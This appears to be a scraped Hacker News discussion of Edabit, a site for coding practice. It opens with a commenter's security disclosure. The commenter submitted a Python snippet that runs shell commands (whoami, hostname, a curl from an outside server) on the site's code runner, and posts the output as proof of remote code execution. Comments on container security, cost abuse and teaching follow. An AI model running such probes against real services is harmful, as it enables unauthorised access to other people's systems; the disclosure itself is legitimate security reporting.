Show HN: Edabit – Like Duolingo for Learning to Code
edabit.com
edabit.com
def hello(): import os print(os.system("whoami")) print(os.system("hostname")) print(os.system("curl http://redacted/ > ./owned.txt")) print(os.system("curl -s http://whatismyip.akamai.com/")) print(os.system("cat ./owned.txt")) print(os.system("ping -c 1 8.8.8.8"))
Results:
codewarrior 5a8eb7db8f0e 162.243.103.238 PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_seq=1 ttl=123 time=0.668 ms --- 8.8.8.8 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.668/0.668/0.668/0.000 ms
162.243.103.238 is a DigitalOcean address. My server's log indicates the curl command actually pulled the file. Please secure your services or they will be abused by wrong doers. In all honesty, I would advise to take the entire service down until this is fully mitigated.
I get your point and the other guy’s too. I line up on the side that disclosures should be messy and embarrassing sometimes, as incentive to really think about what you are doing. The danger here is low.
I would say that for the most part, websites such as this don't actually need a real, full-blown %s-lang compiler/VM that actually executes real code on a backend server. It would be enough to tokenize and parse things on the client's side and validate ABNF via JS. This would reduce the costs involved with running such a website, and the attack surface. If you want to get fancy, you could host an in-browser Python VM - but that's an overkill for a website such as this. Also, they're trying to support a fair bit of languages here, not all of which have browser-targeted tooling that could compile and run the code.
Still, even Rust has a compile-and-execute web service call accessible from the rust-lang home page. If Rust people (who tend to emphasize security) feel it is possible to secure that web service, then I'm inclined to believe them. It may be difficult though.
Not saying that's Apple's reason, but being limited to local execution doesn't mean it's safe.
What specifically are your concerns? What about what you've learned will create an exorbitant bill?
Abusing the containers to send large amounts of outgoing traffic would do just that. Downloading files would do that too. How about sending a "while(true) { }" to hog some CPU? It doesn't take much to cause significant monetary damage.
Depending on their set-up, those containers could contain credentials or some other means to compromise the rest of the website. Perhaps it is possible to re-use the containers across different "sessions", serving multiple clients with malicious traffic. Those are plausible scenarios.
I'm not carrying out a full PT right now. Demonstrating the platform has been compromised is more than enough. Any other questions?
Running ps shows the timeout command as PID 1, and evidently an infinite loop gets killed after some point. In fact, there aren't any other processes besides sh, node, and the Python interpreter, and I'm not familiar with containers to know how this is possibly implemented (because obviously, timeout cannot be PID 1, so ps is wrong here).
What do you mean? It's an arbitrary RCE - a scenario that's generally treated as game over. What specifically are the concerns you don't have if that happens to a system of yours?
Now, I'm not saying that containers are super tight by default. It is entirely possible this particular container env is wide open, but I didn't really see anything too concerning from the parents analysis.
It means pretty much everything. Have you ever heard of someone reporting an RCE in a major service and it being treated as no big deal? They're invariably treated as catastrophic compromise because it is. The jump from RCE to privilege escalation, escape, etc is nothing compared to the actual RCE-ing.
It's very tricky to create and maintain those kinds of container systems, but there are services (for instance, the cloud CI providers) that do it.
On applications like these, where the premise is that you give them some kind of code and they evaluate it for you, escaping the "user interface" sandbox isn't game over; you'd have to finish the exercise of escalating to the container host or getting access to an internal network with internal APIs on it.
It's a little like getting SQL injection, but confined to some kind of SQL view. Chances are the application is doomed, but you still have to prove it.
They have a "Register" button at the top right where you can enter a username and password. If you have shell access to the box (no matter how virtual the box is), there's a good chance you can alter the site's code and capture the passwords people enter. And knowing that, in the real world, people do reuse passwords, this could easily lead to compromising accounts on other sites.
They also have a privacy policy (linked at the bottom) in which they make all kinds of promises about not leaking your personal data. If someone can take over their machine, and they know it, and they don't shut it down, it seems like that would violate the promises made in that privacy policy.
Also, of course, an attacker could alter the site to exploit any vulnerabilities in the users' browsers, so it opens up an attack vector there. Obviously users need to keep browsers patched, but people expect the risk to be lower when visiting legitimate sites.
I didn't mention anything about docker, seeing that containers are a linux kernel feature, but if you know of container escape vulnerabilities in the kernel you should publish them.
For a real-world example check out http://play-with-docker.com as they are running docker-in-docker and all the backend code is at https://github.com/play-with-docker/play-with-docker. So, you can likely get ideas from what they are doing to lock down their env.
[1] https://docs.docker.com/engine/security/security/#linux-kern...
[2] https://docs.docker.com/engine/reference/run/#runtime-privil...
Could I register the domain http://foo ?
I apologize for the confusion. I used an actual server there (ie. http://somename.com) but chose to redact the actual URL from this post.
For a while, the owners of `.ai` had a similar arrangement, but it seems to have been since taken down.
Granted, I really doubt anyone would prosecute over something like this, but a bigger company? Absolutely possible.
Could be placeholders from development that ended up going live. I wouldn't jump to conclusion.
Once you've seen this picture of Brad Frost[1] (a web tech personality), it's hilarious how many startup landing page mockups he appears in. I've personally seen dozens.
[1] https://avatars3.githubusercontent.com/u/383701?s=460&v=4
Also searching I found this, https://ctooltrk.com/ kinda interesting I guess.
Edabit seems too heavily on algorithms. I've seen many beginner students get quickly burned out from doing algorithms when starting out.
I've found the most effective way to teach coding is to make their learning project based (very much like how professors taught concepts back in college). Build X, Y, Z, each project building up in complexity so students can think about different combinations of everything they learned to complete the project.
(Should be very easy to set up, they really want to become more technically savvy but the only volunteers they could find is instructors trying to teach microsoft word)
I have my own curriculum that I've built over the years and the students ultimately end up building a product that they launch (hopefully). This year I got to teach 20 students and so far 14 have gotten full time jobs as software engineers. Fortunately, students who got jobs are all doing well at their jobs so its pretty easy to refer people in.
After the remaining 6 students get a full time job, I plan to open source my curriculum that students have helped polish over the years. You can find the gist of it at c0d3.com
* Not the most secure * A fork of code wars. * Has random photos for testimonials. * W3schools links. *How is it like Duolingo at all?
[1]: https://en.wikipedia.org/wiki/Spaced_repetition
As for sites like Leetcode, those are far more mature (wide selection of languages, custom test cases, etc.) with much more interesting challenges. I appears Edabit is targeting beginners and therefore has much shorter, easier challenges which mainly test memory, not knowledge of algorithms or problem solving. Again, not necessarily the aspect of programming that I would encourage beginners to spend their time on compared to understanding basic concepts.
My search results for CSS problems are so much better now that MDN is the first result.
!mdn array slice
which will take you straight to MDNOne constructive suggestion - is it possible to add auto-indenting to the editor for Python? I hadn't realised how used to it I have become until it is missing here...
Seriously, I need all my information visible to me. What's going on here?
I went through the first python challenge and i think it might be at a slightly higher level than a true beginner would need.
array = [1, 2]
array.reverse!
assert array == __
[0] http://rubykoans.com/it was also on Show HN about a month ago.
https://news.ycombinator.com/item?id=18219960
The idea is basically to allow you to create your OWN flashcards and sync them with Anki with the books you're reading.
Basically you can create flashcards in the app directly and sync them to mobile so you never forget the key points of the documentation you're reading.
Right now I'm working on the cloud version so that people can discover each other and collaborate on building their own cards, share highlights, etc.
Just fyi.
class Test:
def assert_equals(*args):
return TrueConcepts and theory are certainly critical, but one needs to practice in order to achieve mastery. The conceptual framework for all this stuff is covered in detail in other resources, anyway.
After taking a cursory look around, Edabit seems to be filling a very specific need. I like it.
Apps like Duolingo are just a method for daily exposure on the long journey of language learning.
For example, reading only grammar books isn't going to get you there, either. But doing something every day is possibly the most important part, and Duolingo can help you build a habit.
I see this criticism of Duolingo all the time by people who sound like they think it failed them because they weren't fluent after finishing it. There is no roadmap that will make you fluent without serious, multifaceted effort on your own part, so it's quite weak criticism when one tool doesn't take you end-to-end.
Based on the test results, I was skipped past 23 of the 40 topics I can see in the course. Considering that I've been learning for only three months, that makes the course look a bit short.
When I then tried the next lesson, I did notice some questions repeating, but there was also some variety. So I don't know whether it's possible to just memorize all the sentences without learning grammar.
Based on me trying Duolingo a single time now, I'd now say that the biggest problem is the small amount of topics covered in a course, which limits the vocabulary you know how to use after completing it.
But that's not what the original complaint said, so maybe someone who's used Duolingo 5 minutes a day for several months is still in a better position to explain what the actual problem with Duolingo is.
It becomes more apparent when you realize these apps are not smart. They were novel at one point, and maybe you can pick up a phrase to catch a native speaker off guard.
Duolingo is using humans to translate web content that algorithms are unsure about. This is the same founder of reCaptcha, who uses captcha's to use humans to tell robots about what the robots are unsure of.
Memrise, on the other hand, just takes the "87% most used phrases" and tries to get you to memorize the.
They have zero holistic approach to any of the languages they offer. You will never learn tense, language-specific concepts and rules, idioms that break all the rules, or whatever locals just say.